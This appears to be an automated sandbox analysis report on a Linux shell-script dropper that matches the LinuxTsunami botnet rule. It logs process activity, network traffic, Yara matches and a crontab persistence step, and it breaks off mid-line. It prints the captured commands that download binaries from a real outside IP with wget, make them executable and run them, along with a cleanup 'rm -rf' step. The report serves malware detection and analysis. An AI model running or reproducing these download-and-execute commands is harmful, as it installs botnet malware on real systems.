        Source: /bin/sh (PID: 4644)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty2 -O /var/run/tty2Jump to behavior
        Source: /bin/sh (PID: 4672)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty3 -O /var/run/tty3Jump to behavior
        Source: /bin/sh (PID: 4705)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty4 -O /var/run/tty4Jump to behavior
        Source: /bin/sh (PID: 4736)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty5 -O /var/run/tty5Jump to behavior
        Source: /bin/sh (PID: 4768)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/tty6 -O /var/run/tty6Jump to behavior
        Source: /bin/sh (PID: 4800)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O ptyJump to behavior
        Source: /bin/sh (PID: 4832)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq0 -O irq0Jump to behavior
        Source: /bin/sh (PID: 5286)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq1 -O irq1
        Source: /bin/sh (PID: 5876)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/irq2 -O irq2
        Source: /bin/sh (PID: 6199)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/tmp/pty
        Source: /bin/sh (PID: 6288)Wget executable: /usr/bin/wget -> wget http://71.127.148.69/.x/pty -O /var/run/pty
        Source: ./pty (PID: 4846)Socket: 127.0.0.1::63008Jump to behavior
        Source: ./irq0 (PID: 5285)Socket: 127.0.0.1::42076Jump to behavior
        Source: ./irq1 (PID: 5875)Socket: 127.0.0.1::42071
        Source: /usr/sbin/sshd (PID: 6356)Socket: 0.0.0.0::22
        Source: /usr/sbin/sshd (PID: 6356)Socket: [::]::22
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: unknownTCP traffic detected without corresponding DNS query: 71.127.148.69
        Source: global trafficHTTP traffic detected: GET /.x/tty0 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/tty1 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/tty2 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/tty3 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/tty4 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/tty5 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/tty6 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/pty HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/irq0 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/irq1 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/irq2 HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/pty HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /.x/pty HTTP/1.1User-Agent: Wget/1.17.1 (linux-gnu)Accept: */*Accept-Encoding: identityHost: 71.127.148.69Connection: Keep-Alive
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/irq0
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/irq1
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/irq2
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/pty
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty0
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty1
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty2
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty3
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty4
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty5
        Source: 1.shString found in binary or memory: http://71.127.148.69/.x/tty6

        System Summary:

        barindex
        Malicious sample detected (through community Yara rule)Show sources
        Source: 8337.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
        Source: 6287.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
        Source: 4831.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
        Source: 6311.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Author: unknown
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty0 -O /var/run/tty0 ; chmod +x /var/run/tty0 ; chmod 700 /var/run/tty0 ; /var/run/tty0 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty1 -O /var/run/tty1 ; chmod +x /var/run/tty1 ; chmod 700 /var/run/tty1 ; /var/run/tty1 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty2 -O /var/run/tty2 ; chmod +x /var/run/tty2 ; chmod 700 /var/run/tty2 ; /var/run/tty2 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty3 -O /var/run/tty3 ; chmod +x /var/run/tty3 ; chmod 700 /var/run/tty3 ; /var/run/tty3 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty4 -O /var/run/tty4 ; chmod +x /var/run/tty4 ; chmod 700 /var/run/tty4 ; /var/run/tty4 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty5 -O /var/run/tty5 ; chmod +x /var/run/tty5 ; chmod 700 /var/run/tty5 ; /var/run/tty5 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/tty6 -O /var/run/tty6 ; chmod +x /var/run/tty6 ; chmod 700 /var/run/tty6 ; /var/run/tty6 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/pty -O pty ; chmod +x pty ; chmod 700 pty ; ./pty &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/irq0 -O irq0 ; chmod +x irq0 ; chmod 700 irq0 ; ./irq0 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/irq1 -O irq1 ; chmod +x irq1 ; chmod 700 irq1 ; ./irq1 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/irq2 -O irq2 ; chmod +x irq2 ; chmod 700 irq2 ; ./irq2 &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/pty -O /var/tmp/pty ; chmod +x /var/tmp/pty ; chmod 700 /var/tmp/pty ; /var/tmp/pty &
        Source: Initial samplePotential command found: wget http://71.127.148.69/.x/pty -O /var/run/pty ; chmod +x /var/run/pty ; chmod 700 /var/run/pty ; /var/run/pty &
        Source: Initial samplePotential command found: rm -rf /var/run/1sh
        Source: /usr/bin/killall (PID: 5985)SIGKILL sent: pid: 1339, result: successfulJump to behavior
        Source: 8337.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: 6287.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: 4831.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: 6311.1.0000000008048000.000000000805c000.r-x.sdmp, type: MEMORYMatched rule: LinuxTsunami Description = Strings inside, Reference = http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3483, Date = 2014/09/12, Author = @benkow_
        Source: classification engineClassification label: mal100.troj.evad.linSH@0/32@0/0

        Persistence and Installation Behavior:

        barindex
        Executes the "crontab" command typically for achieving persistenceShow sources
        Source: /bin/sh (PID: 5154)Crontab executable: <